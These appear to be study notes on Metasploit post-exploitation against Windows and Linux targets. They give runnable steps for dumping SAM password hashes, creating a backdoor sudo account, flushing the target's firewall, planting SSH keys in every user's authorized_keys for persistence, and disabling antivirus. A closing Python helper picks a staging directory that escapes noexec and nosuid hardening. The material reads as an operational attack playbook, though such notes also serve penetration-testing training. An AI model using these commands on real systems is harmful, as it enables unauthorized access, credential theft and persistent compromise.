- Remote exploitation - using an exploit to gain initial access to a computer over the network.
- Local exploitation - exploiting from within an already compromised computer (typically to escalate privileges).

## What can one do?

- Turn off the firewall and AV, roll back Windows Defender, start RDP, etc.

## Linux

- The highest-privilege user is `root`.

## Windows

- Privilege escalation: `SYSTEM` is the highest privilege level; a normal user such as IEUser is not there yet.
- Get a meterpreter shell -> run local exploits.
- Roll back Windows Defender - use meterpreter or a plain shell depending on requirements.
- Use `bypassuac` to launch a new meterpreter session with admin access. Caveat: a UAC bypass only works when the current user is already in the local Administrators group; it does not elevate a standard user.

```shell
# after getting SYSTEM access, dump the local password hashes from the SAM
run post/windows/gather/hashdump
# this is the Windows counterpart of the Linux shadow file
# note: LM hashes are deprecated; when LM storage is disabled the LM field is
# the hash of an empty string (aad3b435b51404eeaad3b435b51404ee), so there is nothing to crack there
# the NTLM (NT) hash is the one currently used: crack it or pass it
creds              # see the exposed credentials again
run winenum        # windows enumeration script; writes the enumerated .txt files to your attack computer
```

## Manual Backdoor Creation

```shell
shell                     # drop from meterpreter to a system shell (Linux target)
adduser badguy            # interactive on Debian; on a shell without a tty use: useradd -m badguy
id badguy
usermod -aG sudo badguy   # 'sudo' group on Debian/Ubuntu; RHEL-style systems use 'wheel'
id badguy                 # check that the sudo group now appears in the group list
```

## Common Post Exploit Modules

```shell
post/linux/gather/checkvm            # is the target a VM?
post/linux/manage/iptables_removal   # disable the firewall (noisy: flushes the rules on the target)
post/linux/gather/enum_configs       # enumerate config files and save them to our machine
post/linux/manage/sshkey_persistence # add an ssh key to the authorized_keys of every user on the target
```

## Msfconsole - Local Exploit Suggester

```shell
search local_exploit_suggester
use post/multi/recon/local_exploit_suggester
set SESSION 1          # needs an established meterpreter session; upgrade a plain shell first (sessions -u 1)
run                    # checks the session against the local exploit list
use <suggested exploit module>
show payloads
set PAYLOAD <payload>  # try x86 payloads first for backward compatibility
options                # always check options to see which fields are required
run
background
sessions               # see the new session
```

## Common Troubleshooting

- "Exploit completed, but no session was created." - the payload did not work; try another one (check the architecture, reverse vs. bind, and that LHOST/LPORT are reachable from the target).
- "/tmp is mounted nosuid" - a default Linux hardening measure: a setuid binary dropped in /tmp will not elevate privileges, so stage the exploit from another writable directory (many Linux local exploit modules expose a WritableDir option for this).

```shell
search type:post linux   # over 500 post modules, be specific
```
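For the "/tmp is mounted nosuid" failure in the troubleshooting section, here is an added example (not from the original notes) that reads `/proc/mounts`-style lines, resolves which mount a path lives on by longest matching mountpoint, and picks a staging directory whose mount allows exec and, when the exploit relies on a setuid binary, also allows setuid. The mount table is constructed for a hypothetical hardened host; on a real target pass the contents of `/proc/mounts`.

```python
# Constructed /proc/mounts content for a hypothetical hardened Linux target.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
"""


def parse_mounts(text):
    """Return [(mountpoint, set(options))] from /proc/mounts-style lines."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mountpoint = fields[1].replace("\\040", " ")  # /proc/mounts escapes spaces as \040
        mounts.append((mountpoint, set(fields[3].split(","))))
    return mounts


def mount_options(text, path):
    """Options of the mount containing `path`; the longest matching mountpoint wins."""
    normalised = path.rstrip("/") + "/"
    best = None
    for mp, opts in parse_mounts(text):
        if normalised.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best[0]):
                best = (mp, opts)
    if best is None:
        raise ValueError(f"no mount found for {path}")
    return best[1]


def pick_staging_dir(text, candidates=("/tmp", "/dev/shm", "/var/tmp", "/home"), need_suid=False):
    """First candidate whose mount permits exec (and setuid if need_suid); None if nothing fits."""
    for d in candidates:
        opts = mount_options(text, d)
        if "noexec" in opts:
            continue                     # cannot run a dropped binary at all
        if need_suid and "nosuid" in opts:
            continue                     # binary runs, but the setuid bit is ignored
        return d
    return None


if __name__ == "__main__":
    print("/tmp options:", sorted(mount_options(SAMPLE_MOUNTS, "/tmp")))
    print("exec-only staging dir:", pick_staging_dir(SAMPLE_MOUNTS))
    print("setuid staging dir:  ", pick_staging_dir(SAMPLE_MOUNTS, need_suid=True))
```

Writability is a separate check (`os.access(d, os.W_OK)` on the target); this block only answers the mount-option question, which is the one the error message is about.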